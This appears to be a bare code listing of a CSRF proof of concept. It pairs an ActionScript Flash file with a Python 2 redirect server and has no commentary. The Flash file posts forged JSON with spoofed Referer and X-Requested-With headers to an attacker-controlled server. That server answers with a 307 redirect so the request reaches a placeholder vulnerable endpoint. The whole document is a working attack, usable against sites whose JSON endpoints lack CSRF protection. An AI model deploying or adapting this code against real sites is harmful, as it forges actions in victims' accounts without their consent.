package{ import flash.display.Sprite; import flash.net.URLLoader; import

1. package
2. {
3. import flash.display.Sprite;
4. import flash.net.URLLoader;
5. import flash.net.URLRequest;
6. import flash.net.URLRequestHeader;
7. import flash.net.URLRequestMethod;
8.  
9. public class csrf extends Sprite
10. {
11. public function csrf()
12. {
13. super();
14. var member1:Object = null;
15. var myJson:String = null;
16. member1 = new Object();
17. member1 = {
18. "user_id":36427093
19. };
20. var myData:Object = member1;
21. myJson = JSON.stringify(myData);
22. var url:String = "http://my-server:8000/";
23. var request:URLRequest = new URLRequest(url);
24. request.requestHeaders.push(new URLRequestHeader("Content-Type","application/json;charset=utf-8"));
25. request.requestHeaders.push(new URLRequestHeader("Referer","https://some-vulnerable-endpoint"));
26. request.requestHeaders.push(new URLRequestHeader("X-Requested-With","https://some-vulnerable-endpoint"));
27. request.data = myJson;
28. request.method = URLRequestMethod.POST;
29. var urlLoader:URLLoader = new URLLoader();
30.  
31. try
32. {
33. urlLoader.load(request);
34. return;
35. }
36. catch(e:Error)
37. {
38. trace(e);
39. return;
40. }
41. }
42. }
43. }
44.  
45. import BaseHTTPServer
46. import time
47. import sys
48.  
49. HOST = ''
50. PORT = 8000
51. vulnerable_endpoint="https://some-vulnerable-endpoint-here"
52.  
53. class RedirectHandler(BaseHTTPServer.BaseHTTPRequestHandler):
54. def do_POST(s):
55. if s.path == '/csrf.swf':
56. s.send_response(200)
57. s.send_header("Content-Type","application/x-shockwave-flash")
58. s.end_headers()
59. s.wfile.write(open("csrf.swf", "rb").read()) # csrf.swf is the filename you compiled the above actionscript to
60. return
61. s.send_response(307)
62. s.send_header("Location", vulnerable_endpoint)
63. s.end_headers()
64. def do_GET(s):
65. print(s.path)
66. s.do_POST()
67.  
68. if __name__ == '__main__':
69. server_class = BaseHTTPServer.HTTPServer
70. httpd = server_class((HOST,PORT), RedirectHandler)
71. print time.asctime(),"Server Starts - %s:%s" % (HOST,PORT)
72. try:
73. httpd.serve_forever()
74. except KeyboardInterrupt:
75. pass
76. httpd.server_close()
77. print time.asctime(),"Server Stops - %s:%s" % (HOST,PORT)